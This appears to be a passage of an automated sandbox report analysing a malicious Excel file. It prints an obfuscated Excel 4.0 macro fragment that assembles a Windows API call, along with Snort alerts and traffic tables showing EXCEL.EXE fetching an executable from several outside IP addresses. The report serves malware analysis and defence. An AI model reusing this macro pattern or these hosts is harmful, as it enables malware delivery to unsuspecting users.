=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL("U"&AM19&"n",AM20&"A",AM30,'Doc2'!AR84,before.2.0.0 |
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/07/21-09:15:05.069854 | TCP | 2009897 | ET TROJAN Possible Windows executable sent when remote host claims to send html content | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 09:15:00.919925928 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:00.938839912 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:00.938941002 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:00.939644098 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.000272989 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.327353001 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.327575922 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.327745914 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.345602989 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.642882109 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.661051989 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:01.661165953 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.662440062 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:01.720390081 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063385963 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063426018 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.063682079 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:02.063886881 CEST | 49168 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 7, 2021 09:15:02.082295895 CEST | 80 | 49168 | 8.211.4.209 | 192.168.2.22 |
Apr 7, 2021 09:15:02.227967978 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.368988037 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.369075060 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.370420933 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.511811972 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.678519964 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.678713083 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:02.679001093 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:02.679055929 CEST | 49169 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 7, 2021 09:15:03.095360994 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.236845970 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:03.236989975 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.238714933 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:03.379930973 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.319272041 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.319385052 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:04.322556973 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:04.322618008 CEST | 49170 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 7, 2021 09:15:04.757160902 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:04.909230947 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:04.909307957 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:04.909897089 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.061911106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069854021 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069907904 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069946051 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069962025 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.069993019 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.069997072 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070035934 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070048094 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070066929 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070092916 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070121050 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070123911 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070166111 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070178032 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070204973 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070215940 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070241928 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.070265055 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.070295095 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.075287104 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222563028 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222589016 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222600937 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222616911 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222716093 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222773075 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222807884 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222825050 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222858906 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222881079 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222891092 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222898960 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222946882 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.222951889 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.222999096 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223002911 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223022938 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223031998 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223054886 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223071098 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223072052 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223112106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223112106 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223133087 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223151922 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223151922 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223191023 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223208904 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223228931 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223232031 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223253012 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.223280907 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.223311901 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.225841045 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.228734970 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.376903057 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.376960993 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.376991987 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377037048 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377074003 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377099991 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377116919 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377140045 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377146006 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377156973 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377192974 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377194881 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377208948 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377233982 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377258062 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377274036 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377293110 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377321959 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377337933 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377366066 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377393007 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377424002 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377433062 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377471924 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377502918 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377510071 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377526999 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377547979 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377568007 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377587080 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377609015 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377624989 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377645969 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377671003 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377706051 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377718925 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377734900 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377762079 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377799034 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377799034 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377815962 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377839088 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377854109 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377876043 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377904892 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377918005 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377942085 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377957106 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.377979040 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.377981901 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:05.378006935 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.378032923 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.379688978 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:05.382715940 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:07.298922062 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Apr 7, 2021 09:15:07.300324917 CEST | 49171 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 7, 2021 09:15:32.678744078 CEST | 80 | 49169 | 192.185.56.250 | 192.168.2.22 |
Apr 7, 2021 09:15:34.322877884 CEST | 80 | 49170 | 103.211.216.55 | 192.168.2.22 |
Apr 7, 2021 09:15:37.301975965 CEST | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:00.904869080 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:01.338613033 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:01.638679981 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:02.082560062 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:02.225878000 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:02.689320087 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:03.091237068 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Apr 7, 2021 09:15:04.330058098 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 09:15:04.754915953 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:01.338613033 CEST | 192.168.2.22 | 8.8.8.8 | 0x5115 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:02.082560062 CEST | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:02.689320087 CEST | 192.168.2.22 | 8.8.8.8 | 0x9610 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:04.330058098 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.904869080 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | | | 8.211.4.209 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:01.638679981 CEST | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | | | 8.211.4.209 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:02.225878000 CEST | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | | | 192.185.56.250 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:03.091237068 CEST | 8.8.8.8 | 192.168.2.22 | 0x9610 | No error (0) | | | 103.211.216.55 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:04.754915953 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | | | 111.118.215.222 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:00.939644098 CEST | 0 | OUT | |
Apr 7, 2021 09:15:01.327353001 CEST | 1 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:01.662440062 CEST | 2 | OUT | |
Apr 7, 2021 09:15:02.063385963 CEST | 2 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 192.185.56.250 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:02.370420933 CEST | 3 | OUT | |
Apr 7, 2021 09:15:02.678519964 CEST | 3 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49170 | 103.211.216.55 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:03.238714933 CEST | 4 | OUT | |
Apr 7, 2021 09:15:04.319272041 CEST | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49171 | 111.118.215.222 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:04.909897089 CEST | 6 | OUT | |
Apr 7, 2021 09:15:05.069854021 CEST | 7 | IN | |